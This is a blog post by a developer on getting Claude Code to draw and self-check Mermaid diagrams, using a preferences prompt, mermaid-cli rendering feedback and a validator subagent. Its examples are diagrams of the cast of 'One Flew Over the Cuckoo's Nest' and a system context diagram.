<p>I wanted a before-and-after comparison - so I made a <a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/cuckoo_actors.md">simple markdown file of all the famous actors in “One Flew Over the Cuckoo’s Nest”</a> - here is a diagram using Claude without any extra prompts:</p>

<pre><code class="language-mermaid">graph TD
    JN[Jack Nicholson&lt;br/&gt;McMurphy]
    SC[Scatman Crothers&lt;br/&gt;Turkel]
    DD[Danny DeVito&lt;br/&gt;Martini]
    CL[Christopher Lloyd&lt;br/&gt;Max Taber]
    LF[Louise Fletcher&lt;br/&gt;Nurse Ratched]
    BD[Brad Dourif&lt;br/&gt;Billy Bibbit]
    WS[Will Sampson&lt;br/&gt;Chief Bromden]

    JN ---|"4 films&lt;br/&gt;1972-1980"| SC
    JN ---|"3 films&lt;br/&gt;1975-1983"| DD
    DD ---|"3 works&lt;br/&gt;1975-1983"| CL
    JN ---|"2 films&lt;br/&gt;1975-1978"| CL
    JN --- LF
    JN --- BD
    JN --- WS

    style JN fill:#ff9999
    style SC fill:#ffcc99
    style DD fill:#99ccff
    style CL fill:#99ccff
    style LF fill:#cccccc
    style BD fill:#cccccc
    style WS fill:#cccccc
</code></pre>

<p>and here is the same, using my basic prompt:</p>

<pre><code class="language-txt">⏺ Now let me test the diagram to make sure it renders correctly:
  ⎿  Error: Parse error on line 20:
     ...o    nicholson ==|"2 films"| lloyd
     ----------------------^
     Expecting 'LINK', 'UNICODE_TEXT', 'EDGE_TEXT', got 'STR'
</code></pre>

<p>Oops! That was actually the first try, so I tried again:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    primaryColor: '#e0e7ff'
    primaryTextColor: '#1e293b'
    primaryBorderColor: '#6366f1'
    lineColor: '#94a3b8'
    secondaryColor: '#fef3c7'
    tertiaryColor: '#fecaca'
    fontSize: 14px
---
graph TB
    %% Define actor nodes
    nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"]
    fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"]
    devito["Danny DeVito&lt;br/&gt;(Martini)"]
    lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"]
    dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"]
    sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"]
    crothers["Scatman Crothers&lt;br/&gt;(Turkel)"]

    %% Central film connection
    ofotcn["One Flew Over the&lt;br/&gt;Cuckoo's Nest&lt;br/&gt;(1975)"]

    %% OFOTCN connections (single weight)
    nicholson --- ofotcn
    fletcher --- ofotcn
    devito --- ofotcn
    lloyd --- ofotcn
    dourif --- ofotcn
    sampson --- ofotcn
    crothers --- ofotcn

    %% Strong connection: Nicholson &amp; Crothers (4 films)
    nicholson ---|"4 films&lt;br/&gt;1972-1980"| crothers

    %% Strong connection: DeVito &amp; Lloyd (3 collaborations)
    devito ---|"3 works&lt;br/&gt;incl. Taxi"| lloyd

    %% Strong connection: Nicholson &amp; DeVito (3 films)
    nicholson ---|"3 films&lt;br/&gt;1975-1983"| devito

    %% Medium connection: Nicholson &amp; Lloyd (2 films)
    nicholson ---|"2 films"| lloyd

    %% Define styles
    classDef actorStyle fill:#dbeafe,stroke:#3b82f6,stroke-width:2px,color:#1e293b
    classDef filmStyle fill:#fef3c7,stroke:#f59e0b,stroke-width:2px,color:#78350f
    classDef starStyle fill:#e0e7ff,stroke:#6366f1,stroke-width:3px,color:#1e293b

    %% Apply styles
    class nicholson starStyle
    class fletcher,devito,lloyd,dourif,sampson,crothers actorStyle
    class ofotcn filmStyle

    %% Style the edges by strength (numbered in order of definition)
    linkStyle 7 stroke:#dc2626,stroke-width:5px
    linkStyle 8 stroke:#dc2626,stroke-width:4px
    linkStyle 9 stroke:#dc2626,stroke-width:4px
    linkStyle 10 stroke:#f59e0b,stroke-width:3px
</code></pre>

<h2 id="better-results-through-feedback-and-iteration">Better results through feedback and iteration</h2>

<p>This is nice - but Claude didn’t pick up on the error initially - we needed one key thing that helps agentic LLMs - feedback! On its own, Claude will sometimes make a mistake and not even notice. But - give it a way to get some feedback and things get much better. And it’s pretty easy to get feedback on Mermaid diagrams, using the <a href="https://github.com/mermaid-js/mermaid-cli">Mermaid-cli command-line tool</a> - this can syntax check mermaid diagrams, and convert them to png files using a simple command like:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx <span class="nt">-p</span> @mermaid-js/mermaid-cli@latest mmdc <span class="nt">-s</span> 3 <span class="nt">-i</span> tmp.mmd <span class="nt">-o</span> tmp.png
</code></pre></div></div>

<p class="notice">(note: previously I didn’t include <code class="language-plaintext highlighter-rouge">@latest</code> which meant npx only ever fetched the Mermaid CLI tool once and never updated it! Now I add <code class="language-plaintext highlighter-rouge">@latest</code> and npx will check for new versions and stay up to date)</p>

<p>So I modified my prompt to gather feedback:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You should test any mermaid diagrams you draw:
<span class="p">    1.</span> extract just the mermaid diagram from the markdown file,
<span class="p">    2.</span> call mermaid-cli to convert it to a png file
<span class="p">    3.</span> check for any syntax errors returned
<span class="p">    4.</span> read the png file to see if it looks like what was wanted
<span class="p">    5.</span> delete the png file if all is OK

(followed by instructions on using mermaid-cli)
</code></pre></div></div>

<p>This means Claude can both see any syntax errors, and also <em>read the image that is produced</em> - despite being named a “Large Language Model”, Claude is actually a Multi-Modal Model and can read and interpret images. So if we tell it to, it will read the png file and “understand” it, sort-of. It’s really doing something similar to what it does with language - it turns the image into some sort of tokens and then does pattern matching. The actual abilities and limitations are <em>very</em> unclear - I encourage people to experiment. It certainly seems to be good enough for validating diagrams!</p>

<p>(Side note - <a href="https://docs.claude.com/en/docs/build-with-claude/vision#evaluate-image-size">Anthropic have recommended maximum image sizes to use</a> - sadly <code class="language-plaintext highlighter-rouge">mermaid-cli</code> doesn’t actually respect image sizes you pass to it, for really big diagrams you might need to lower the <code class="language-plaintext highlighter-rouge">-s 3</code> parameter)</p>

<p><a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-with-feedback.md">The full prompt file is here</a></p>

<p>(Another side note - I tried using SVG outputs instead, but they ended up doing much worse - the mermaid svg output files are massive and Claude didn’t do well at reading them)</p>

<p>If you use this prompt, Claude will make a diagram, turn it into an image, and then <em>iterate</em> - if there’s an error or something that goes against your requests, it will keep trying - this is especially good for avoiding syntax errors.</p>

<h2 id="aside---reverse-engineering-diagram-images">Aside - reverse engineering diagram images</h2>

<p>Because Claude can read images, it can also <em>turn an image of a diagram into a mermaid diagram</em>. This isn’t perfect - a lot of diagrams can’t be turned exactly into Mermaid - but it works pretty well. Just yesterday a colleague sent me a screenshot of a mermaid diagram they’d drawn, and I just pasted it into Claude Code (you can paste images directly into Claude Code!) and said “please generate a mermaid diagram from this image”.</p>

<p>For another example - if I grab the diagram from <a href="https://en.wikipedia.org/wiki/System_context_diagram">this wikipedia page</a>:</p>

<p><img src="/assets/images/2025-10-10-agent-mermaid-reporting-for-duty/nde-diagram.png" alt="nde diagram" /></p>

<p>And ask Claude to turn it into a mermaid diagram, I get:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    primaryColor: '#d4f4dd'
    primaryTextColor: '#000000'
    primaryBorderColor: '#333333'
    secondaryColor: '#b3e5fc'
    secondaryTextColor: '#000000'
    secondaryBorderColor: '#333333'
    tertiaryColor: '#90ee90'
    fontSize: 14px
    lineColor: '#333333'
---
graph TB
    %% Define stakeholder nodes (light green boxes)
    IDPS["Interface&lt;br/&gt;Data&lt;br/&gt;Processing&lt;br/&gt;Segment&lt;br/&gt;(IDPS)"]
    MMC["Mission&lt;br/&gt;Management&lt;br/&gt;Center&lt;br/&gt;(MMC)"]
    PD["Product&lt;br/&gt;Developers"]
    IPO["Integrated&lt;br/&gt;Program&lt;br/&gt;Office&lt;br/&gt;(IPO)"]
    CUSTOMERS["CUSTOMERS"]
    CLASS["Comprehensive&lt;br/&gt;Large Array&lt;br/&gt;Stewardship&lt;br/&gt;System&lt;br/&gt;(CLASS)"]
    MGMT["Management"]

    %% Define central node (light blue ellipse)
    NDE(["NPOESS&lt;br/&gt;Data&lt;br/&gt;Exploitation&lt;br/&gt;(NDE)"])

    %% Data flows
    IDPS --&gt;|xDRs| NDE
    MMC --&gt;|Instrument Status| NDE
    MMC --&gt;|Satellite Status| NDE
    PD --&gt;|Algorithms| NDE
    NDE --&gt;|Operational&lt;br/&gt;Standards| PD
    IPO --&gt;|Service Requests| NDE
    NDE --&gt;|xDR Enhancement&lt;br/&gt;Requirements| IPO

    NDE --&gt;|NOAA-unique Products| CUSTOMERS
    NDE --&gt;|Tailored Products| CUSTOMERS
    NDE --&gt;|Service Requests| CUSTOMERS
    NDE --&gt;|Service Responses| CUSTOMERS

    NDE --&gt;|NOAA-unique&lt;br/&gt;Products| CLASS
    NDE --&gt;|System&lt;br/&gt;Components| CLASS

    NDE --&gt;|Reports| MGMT

    %% Style definitions
    classDef stakeholder fill:#90ee90,stroke:#333,stroke-width:2px,color:#000;
    classDef central fill:#b3e5fc,stroke:#333,stroke-width:3px,color:#000;

    %% Apply styles
    class IDPS,MMC,PD,IPO,CUSTOMERS,CLASS,MGMT stakeholder;
    class NDE central;
</code></pre>

<p>It looks quite different - Mermaid doesn’t really let you tweak layout much - but the content is correct (I haven’t checked closely!) and now I have an easily modified diagram.</p>

<h2 id="a-further-refinement---using-a-subagent">A further refinement - using a subagent</h2>

<p>The only downside of all of this mermaid processing is - it consumes context.  A key thing I’ve learned in the last few months is that <em>LLMs have limited context storage, and the more context you give them, the worse they work</em>. Basically, too much information confuses them - they start ignoring things, they start getting tangled up. This is especially true if you change the subject a lot - ask an LLM about “One Flew Over the Cuckoo’s Nest” and then about “subgraphs in mermaid” and you run the risk of getting poorer results. Especially if you run out of context - Claude has an auto-packing mechanism that compresses context for you, but it isn’t perfect - and generally you are far better using <code class="language-plaintext highlighter-rouge">/clear</code> and starting from scratch as often as you can.</p>

<p>So if I want to draw one diagram, the basic feedback-driven prompt is fine - but if I want to draw a lot, I use a sub-agent. In Claude Code, a sub-agent is simply a markdown file in a special location - <code class="language-plaintext highlighter-rouge">~/.claude/agents/</code> for global agents (<a href="https://docs.claude.com/en/docs/claude-code/sub-agents">read the docs</a> for more details) which Claude can run <em>as a child process</em>. The main Claude context is inherited by the child, but it has its own context, and when it finishes, all of its temporary workings are thrown away.</p>

<p>This is great for keeping things clean - I have an agent that knows about <code class="language-plaintext highlighter-rouge">mermaid-cli</code> and does all the image parsing and syntax checking for me, but my main context doesn’t care.</p>

<p>My agent is pretty simple:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">---</span>
<span class="na">name</span><span class="pi">:</span> <span class="s">mermaid-diagram-validator</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Use this agent to validate Mermaid.js diagram syntax and visual quality from a file. Provide a file path to either a .mmd file (pure Mermaid) or .md file (markdown with embedded Mermaid diagrams).</span> 
<span class="na">tools</span><span class="pi">:</span> <span class="s">Bash, Read</span>
<span class="na">model</span><span class="pi">:</span> <span class="s">sonnet</span>
<span class="nn">---</span>

You are an expert Mermaid.js diagram validator with deep knowledge of diagram rendering, visual accessibility, and the Mermaid CLI toolchain. Your primary responsibility is to validate Mermaid diagram code by generating actual PNG outputs and analysing them for both technical correctness and visual quality.

<span class="gs">**IMPORTANT**</span>: Before starting validation, read <span class="sb">`/Users/korny/ai/prompts/mermaid.md`</span> to understand the user's Mermaid preferences, styling guidelines, and best practices. Use this information when providing feedback and suggestions.
...
</code></pre></div></div>

<p>(Note the YAML description is actually a fair bit longer - see <a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-diagram-validator.md">the full mermaid-diagram-validator.md</a> for the full text)</p>

<p>Then my main <a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-agentic.md">mermaid-agentic.md</a> just says “use the agent” :</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gh"># Mermaid.js Guide for Claude Code</span>

This is an advanced guide to building mermaid diagrams

<span class="gu">## Testing with the mermaid-diagram-validator subagent</span>

<span class="gs">**ALWAYS**</span> test any mermaid diagrams you draw using the mermaid-diagram-validator subagent before you consider them done. <span class="gs">**NEVER**</span> trust your judgement - the agent will do a better job.
</code></pre></div></div>

<p>The output is basically the same as the non-agent version; though LLMs being non-deterministic, every time you get a different diagram:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    primaryColor: '#e0f2fe'
    primaryTextColor: '#0c4a6e'
    primaryBorderColor: '#0369a1'
    lineColor: '#64748b'
    fontSize: 14px
---
graph TB
    %% Define actors
    nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"]
    fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"]
    devito["Danny DeVito&lt;br/&gt;(Martini)"]
    lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"]
    dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"]
    sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"]
    crothers["Scatman Crothers&lt;br/&gt;(Turkel)"]

    %% Define invisible subgraph for central cluster
    subgraph main[" "]
        nicholson
        devito
        lloyd
        crothers
    end

    subgraph side[" "]
        fletcher
        dourif
        sampson
    end

    %% Strong connections (4 films)
    nicholson ---|"4 films (1972-1980)"| crothers

    %% Medium-strong connections (3 collaborations)
    nicholson ---|"3 films including Terms of Endearment"| devito
    devito ---|"3 projects including Taxi TV"| lloyd

    %% Medium connections (2 films)
    nicholson ---|"2 films including Goin South"| lloyd

    %% Single film connections (OFOTCN only)
    nicholson ---|"OFOTCN only"| fletcher
    nicholson ---|"OFOTCN only"| dourif
    nicholson ---|"OFOTCN only"| sampson

    %% Apply invisible style
    classDef invisible fill:#0000,stroke:#0000;
    class main,side invisible;

    %% Style definitions
    classDef central fill:#3b82f6,stroke:#1e40af,color:#fff,stroke-width:3px;
    classDef supporting fill:#60a5fa,stroke:#2563eb,color:#fff,stroke-width:2px;
    classDef peripheral fill:#93c5fd,stroke:#3b82f6,color:#1e3a8a,stroke-width:2px;

    %% Apply styles
    class nicholson central;
    class devito,lloyd,crothers supporting;
    class fletcher,dourif,sampson peripheral;

    %% Style edges by strength
    linkStyle 0 stroke:#15803d,stroke-width:6px;
    linkStyle 1 stroke:#16a34a,stroke-width:4px;
    linkStyle 2 stroke:#16a34a,stroke-width:4px;
    linkStyle 3 stroke:#22c55e,stroke-width:3px;
    linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1px,stroke-dasharray:5 5;
</code></pre>

<p>I didn’t like this so I asked:</p>

<blockquote>
  <p>the diagram is still a bit ugly - can you clear it up and make it look nicer?</p>
</blockquote>

<p>and got:</p>

<pre><code class="language-mermaid">---
config:
  theme: base
  themeVariables:
    fontSize: 16px
---
graph LR
    %% Define actors with stadium shape for central hub
    nicholson(["Jack Nicholson&lt;br/&gt;McMurphy"])

    %% Supporting actors with rounded rectangles
    devito["Danny DeVito&lt;br/&gt;Martini"]
    lloyd["Christopher Lloyd&lt;br/&gt;Max Taber"]
    crothers["Scatman Crothers&lt;br/&gt;Turkel"]

    %% Peripheral actors
    fletcher["Louise Fletcher&lt;br/&gt;Nurse Ratched"]
    dourif["Brad Dourif&lt;br/&gt;Billy Bibbit"]
    sampson["Will Sampson&lt;br/&gt;Chief Bromden"]

    %% Layout using invisible subgraphs
    subgraph left[" "]
        fletcher
        dourif
        sampson
    end

    subgraph center[" "]
        nicholson
    end

    subgraph right[" "]
        crothers
        devito
        lloyd
    end

    %% Connections - strongest first
    nicholson ---|"4 films (1972-1980)"| crothers
    nicholson ---|"3 films including Terms of Endearment"| devito
    devito ---|"3 projects including Taxi TV"| lloyd
    nicholson ---|"2 films including Goin South"| lloyd

    %% Single film connections
    nicholson ---|"OFOTCN only"| fletcher
    nicholson ---|"OFOTCN only"| dourif
    nicholson ---|"OFOTCN only"| sampson

    %% Apply invisible style to subgraphs
    classDef invisible fill:#0000,stroke:#0000;
    class left,center,right invisible;

    %% Style definitions - warm sophisticated palette
    classDef hub fill:#f59e0b,stroke:#d97706,color:#fff,stroke-width:4px,rx:20,ry:20;
    classDef inner fill:#3b82f6,stroke:#2563eb,color:#fff,stroke-width:3px,rx:10,ry:10;
    classDef outer fill:#e0e7ff,stroke:#818cf8,color:#1e1b4b,stroke-width:2px,rx:10,ry:10;

    %% Apply styles
    class nicholson hub;
    class crothers,devito,lloyd inner;
    class fletcher,dourif,sampson outer;

    %% Style edges with color gradient by strength
    linkStyle 0 stroke:#dc2626,stroke-width:7px;
    linkStyle 1 stroke:#ea580c,stroke-width:5px;
    linkStyle 2 stroke:#ea580c,stroke-width:5px;
    linkStyle 3 stroke:#f59e0b,stroke-width:4px;
    linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1.5px,stroke-dasharray:4 4;
</code></pre>

<p>For a real problem I tend to iterate a lot - “Can you group these things together?” or “Can you change the colour of X to something more blue-green?” - but it’s quite straightforward.</p>

<p>Note, by the way, that this is a fun example of using agents but not a <em>huge</em> improvement. I find myself going back to the non-agentic version for tweaking - it uses more context, but it also knows a lot more about the image produced - the agentic version has to turn the image to a text description, which means it loses a bit of information along the way. But for generating a lot of diagrams quickly, it’s great - especially when I’m documenting a whole project, I just want diagrams that work and want them quickly.</p>

<p>There is one slight hassle - permissions. Claude will prompt you over and over again “Do you want to run <code class="language-plaintext highlighter-rouge">npx -p @mermaid-js/mermaid-cli@latest mmdc -s 3 -i ...</code>?” - in theory <a href="https://docs.claude.com/en/docs/claude-code/iam#tool-specific-permission-rules">you can set Bash permissions with wildcards</a> but in my experience it just doesn’t work, except for very simple exact matches. Even giving it permissions <code class="language-plaintext highlighter-rouge">Bash(rm /tmp/mermaid:*)</code> doesn’t work - I get asked for every single file removal. I don’t mind Claude being cautious here - but it is very tedious that it asks ever single time.</p>

<p>So I built a workaround - using their suggestion <a href="https://docs.claude.com/en/docs/claude-code/iam#additional-permission-control-with-hooks">Additional permission control with hooks</a> - which I’ll document in the next post!</p>

<hr />

<p>I’ve given up on Discus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115395530660357132">My post on Mastodon</a> or <a href="https://bsky.app/profile/korny.sietsma.com/post/3m3hx2gfjb22z">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>This secret agent mermaid was generated by Claude, inspired by Simon Willison’s <a href="https://simonwillison.net/2024/Oct/25/pelicans-on-a-bicycle/">pelican on a bicycle</a> LLM benchmark. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="Development" /><category term="claude-code" /><category term="mermaid" /><category term="diagrams" /><category term="agents" /><category term="ai-tools" /><summary type="html"><![CDATA[Note see also my standard AI Disclaimer Update: This post was updated to use the latest Mermaid version, and a few other tweaks. 1 Introduction My last few posts have been rather theoretical, this is back to a “here is how I solved a problem” post. A while ago I blogged about better ways to make Mermaid diagrams but that was in the “before times” when I would do these things by hand, like a savage. OK I still edit them by hand - but LLMs like Claude Code are pretty good at drawing Mermaid - it’s just text, after all. However, out of the box, Claude is trained on sample mermaid code in the wild - so it doesn’t always know the latest syntax, recent additions, or my own preferences. So this is a classic scenario where prompting can help. The basic prompt My first attempt at this just embedded all my Mermaid preferences in a markdown file I could load. Note I load this as needed - I don’t always want to draw Mermaid diagrams, and a key thing we are all discovering about agentic LLM tools is don’t pollute the context - the more things you tell Claude about, the worse it performs. So for Mermaid I have a prompt command /better-mermaid that loads all my settings into the current session. If I start a new session, or run /clear, all that noise is gone. My prompt starts: # Mermaid.js Guide for Claude Code This is an advanced guide to building mermaid diagrams ## My preferences - I like light backgrounds, so any text displayed on the background should be black or dark - For text on shapes, you should make sure that either you use light text on a dark shape, or dark text on a light shape. ## Quick Reference - **Hand-drawn look**: Add `config: look: handDrawn` in frontmatter - **Invisible subgraphs**: Use `classDef invisible fill:#0000,stroke:#0000;` - **New shape syntax**: `NodeName@{shape: diamond, label: "Decision"}` - **Common shapes**: rect, rounded, diamond (decisions), cyl (database), doc (document), hex (process), trap-b (trapezoid), lean-r (I/O) Here is the full file. Note this was largely generated by Claude, partly based on my previous blog post! I’ve tweaked it a few times but it’s very hard to predict what will and won’t make good diagrams; this definitely needs more tweaking over time, and to suit individual preferences. I wanted a before-and-after comparison - so I made a simple markdown file of all the famous actors in “One Flew Over the Cuckoo’s Nest” - here is a diagram using Claude without any extra prompts: graph TD JN[Jack Nicholson&lt;br/&gt;McMurphy] SC[Scatman Crothers&lt;br/&gt;Turkel] DD[Danny DeVito&lt;br/&gt;Martini] CL[Christopher Lloyd&lt;br/&gt;Max Taber] LF[Louise Fletcher&lt;br/&gt;Nurse Ratched] BD[Brad Dourif&lt;br/&gt;Billy Bibbit] WS[Will Sampson&lt;br/&gt;Chief Bromden] JN ---|"4 films&lt;br/&gt;1972-1980"| SC JN ---|"3 films&lt;br/&gt;1975-1983"| DD DD ---|"3 works&lt;br/&gt;1975-1983"| CL JN ---|"2 films&lt;br/&gt;1975-1978"| CL JN --- LF JN --- BD JN --- WS style JN fill:#ff9999 style SC fill:#ffcc99 style DD fill:#99ccff style CL fill:#99ccff style LF fill:#cccccc style BD fill:#cccccc style WS fill:#cccccc and here is the same, using my basic prompt: ⏺ Now let me test the diagram to make sure it renders correctly: ⎿  Error: Parse error on line 20: ...o nicholson ==|"2 films"| lloyd ----------------------^ Expecting 'LINK', 'UNICODE_TEXT', 'EDGE_TEXT', got 'STR' Oops! That was actually the first try, so I tried again: --- config: theme: base themeVariables: primaryColor: '#e0e7ff' primaryTextColor: '#1e293b' primaryBorderColor: '#6366f1' lineColor: '#94a3b8' secondaryColor: '#fef3c7' tertiaryColor: '#fecaca' fontSize: 14px --- graph TB %% Define actor nodes nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"] fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"] devito["Danny DeVito&lt;br/&gt;(Martini)"] lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"] dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"] sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"] crothers["Scatman Crothers&lt;br/&gt;(Turkel)"] %% Central film connection ofotcn["One Flew Over the&lt;br/&gt;Cuckoo's Nest&lt;br/&gt;(1975)"] %% OFOTCN connections (single weight) nicholson --- ofotcn fletcher --- ofotcn devito --- ofotcn lloyd --- ofotcn dourif --- ofotcn sampson --- ofotcn crothers --- ofotcn %% Strong connection: Nicholson &amp; Crothers (4 films) nicholson ---|"4 films&lt;br/&gt;1972-1980"| crothers %% Strong connection: DeVito &amp; Lloyd (3 collaborations) devito ---|"3 works&lt;br/&gt;incl. Taxi"| lloyd %% Strong connection: Nicholson &amp; DeVito (3 films) nicholson ---|"3 films&lt;br/&gt;1975-1983"| devito %% Medium connection: Nicholson &amp; Lloyd (2 films) nicholson ---|"2 films"| lloyd %% Define styles classDef actorStyle fill:#dbeafe,stroke:#3b82f6,stroke-width:2px,color:#1e293b classDef filmStyle fill:#fef3c7,stroke:#f59e0b,stroke-width:2px,color:#78350f classDef starStyle fill:#e0e7ff,stroke:#6366f1,stroke-width:3px,color:#1e293b %% Apply styles class nicholson starStyle class fletcher,devito,lloyd,dourif,sampson,crothers actorStyle class ofotcn filmStyle %% Style the edges by strength (numbered in order of definition) linkStyle 7 stroke:#dc2626,stroke-width:5px linkStyle 8 stroke:#dc2626,stroke-width:4px linkStyle 9 stroke:#dc2626,stroke-width:4px linkStyle 10 stroke:#f59e0b,stroke-width:3px Better results through feedback and iteration This is nice - but Claude didn’t pick up on the error initially - we needed one key thing that helps agentic LLMs - feedback! On its own, Claude will sometimes make a mistake and not even notice. But - give it a way to get some feedback and things get much better. And it’s pretty easy to get feedback on Mermaid diagrams, using the Mermaid-cli command-line tool - this can syntax check mermaid diagrams, and convert them to png files using a simple command like: npx -p @mermaid-js/mermaid-cli@latest mmdc -s 3 -i tmp.mmd -o tmp.png (note: previously I didn’t include @latest which meant npx only ever fetched the Mermaid CLI tool once and never updated it! Now I add @latest and npx will check for new versions and stay up to date) So I modified my prompt to gather feedback: You should test any mermaid diagrams you draw: 1. extract just the mermaid diagram from the markdown file, 2. call mermaid-cli to convert it to a png file 3. check for any syntax errors returned 4. read the png file to see if it looks like what was wanted 5. delete the png file if all is OK (followed by instructions on using mermaid-cli) This means Claude can both see any syntax errors, and also read the image that is produced - despite being named a “Large Language Model”, Claude is actually a Multi-Modal Model and can read and interpret images. So if we tell it to, it will read the png file and “understand” it, sort-of. It’s really doing something similar to what it does with language - it turns the image into some sort of tokens and then does pattern matching. The actual abilities and limitations are very unclear - I encourage people to experiment. It certainly seems to be good enough for validating diagrams! (Side note - Anthropic have recommended maximum image sizes to use - sadly mermaid-cli doesn’t actually respect image sizes you pass to it, for really big diagrams you might need to lower the -s 3 parameter) The full prompt file is here (Another side note - I tried using SVG outputs instead, but they ended up doing much worse - the mermaid svg output files are massive and Claude didn’t do well at reading them) If you use this prompt, Claude will make a diagram, turn it into an image, and then iterate - if there’s an error or something that goes against your requests, it will keep trying - this is especially good for avoiding syntax errors. Aside - reverse engineering diagram images Because Claude can read images, it can also turn an image of a diagram into a mermaid diagram. This isn’t perfect - a lot of diagrams can’t be turned exactly into Mermaid - but it works pretty well. Just yesterday a colleague sent me a screenshot of a mermaid diagram they’d drawn, and I just pasted it into Claude Code (you can paste images directly into Claude Code!) and said “please generate a mermaid diagram from this image”. For another example - if I grab the diagram from this wikipedia page: And ask Claude to turn it into a mermaid diagram, I get: --- config: theme: base themeVariables: primaryColor: '#d4f4dd' primaryTextColor: '#000000' primaryBorderColor: '#333333' secondaryColor: '#b3e5fc' secondaryTextColor: '#000000' secondaryBorderColor: '#333333' tertiaryColor: '#90ee90' fontSize: 14px lineColor: '#333333' --- graph TB %% Define stakeholder nodes (light green boxes) IDPS["Interface&lt;br/&gt;Data&lt;br/&gt;Processing&lt;br/&gt;Segment&lt;br/&gt;(IDPS)"] MMC["Mission&lt;br/&gt;Management&lt;br/&gt;Center&lt;br/&gt;(MMC)"] PD["Product&lt;br/&gt;Developers"] IPO["Integrated&lt;br/&gt;Program&lt;br/&gt;Office&lt;br/&gt;(IPO)"] CUSTOMERS["CUSTOMERS"] CLASS["Comprehensive&lt;br/&gt;Large Array&lt;br/&gt;Stewardship&lt;br/&gt;System&lt;br/&gt;(CLASS)"] MGMT["Management"] %% Define central node (light blue ellipse) NDE(["NPOESS&lt;br/&gt;Data&lt;br/&gt;Exploitation&lt;br/&gt;(NDE)"]) %% Data flows IDPS --&gt;|xDRs| NDE MMC --&gt;|Instrument Status| NDE MMC --&gt;|Satellite Status| NDE PD --&gt;|Algorithms| NDE NDE --&gt;|Operational&lt;br/&gt;Standards| PD IPO --&gt;|Service Requests| NDE NDE --&gt;|xDR Enhancement&lt;br/&gt;Requirements| IPO NDE --&gt;|NOAA-unique Products| CUSTOMERS NDE --&gt;|Tailored Products| CUSTOMERS NDE --&gt;|Service Requests| CUSTOMERS NDE --&gt;|Service Responses| CUSTOMERS NDE --&gt;|NOAA-unique&lt;br/&gt;Products| CLASS NDE --&gt;|System&lt;br/&gt;Components| CLASS NDE --&gt;|Reports| MGMT %% Style definitions classDef stakeholder fill:#90ee90,stroke:#333,stroke-width:2px,color:#000; classDef central fill:#b3e5fc,stroke:#333,stroke-width:3px,color:#000; %% Apply styles class IDPS,MMC,PD,IPO,CUSTOMERS,CLASS,MGMT stakeholder; class NDE central; It looks quite different - Mermaid doesn’t really let you tweak layout much - but the content is correct (I haven’t checked closely!) and now I have an easily modified diagram. A further refinement - using a subagent The only downside of all of this mermaid processing is - it consumes context. A key thing I’ve learned in the last few months is that LLMs have limited context storage, and the more context you give them, the worse they work. Basically, too much information confuses them - they start ignoring things, they start getting tangled up. This is especially true if you change the subject a lot - ask an LLM about “One Flew Over the Cuckoo’s Nest” and then about “subgraphs in mermaid” and you run the risk of getting poorer results. Especially if you run out of context - Claude has an auto-packing mechanism that compresses context for you, but it isn’t perfect - and generally you are far better using /clear and starting from scratch as often as you can. So if I want to draw one diagram, the basic feedback-driven prompt is fine - but if I want to draw a lot, I use a sub-agent. In Claude Code, a sub-agent is simply a markdown file in a special location - ~/.claude/agents/ for global agents (read the docs for more details) which Claude can run as a child process. The main Claude context is inherited by the child, but it has its own context, and when it finishes, all of its temporary workings are thrown away. This is great for keeping things clean - I have an agent that knows about mermaid-cli and does all the image parsing and syntax checking for me, but my main context doesn’t care. My agent is pretty simple: --- name: mermaid-diagram-validator description: Use this agent to validate Mermaid.js diagram syntax and visual quality from a file. Provide a file path to either a .mmd file (pure Mermaid) or .md file (markdown with embedded Mermaid diagrams). tools: Bash, Read model: sonnet --- You are an expert Mermaid.js diagram validator with deep knowledge of diagram rendering, visual accessibility, and the Mermaid CLI toolchain. Your primary responsibility is to validate Mermaid diagram code by generating actual PNG outputs and analysing them for both technical correctness and visual quality. **IMPORTANT**: Before starting validation, read `/Users/korny/ai/prompts/mermaid.md` to understand the user's Mermaid preferences, styling guidelines, and best practices. Use this information when providing feedback and suggestions. ... (Note the YAML description is actually a fair bit longer - see the full mermaid-diagram-validator.md for the full text) Then my main mermaid-agentic.md just says “use the agent” : # Mermaid.js Guide for Claude Code This is an advanced guide to building mermaid diagrams ## Testing with the mermaid-diagram-validator subagent **ALWAYS** test any mermaid diagrams you draw using the mermaid-diagram-validator subagent before you consider them done. **NEVER** trust your judgement - the agent will do a better job. The output is basically the same as the non-agent version; though LLMs 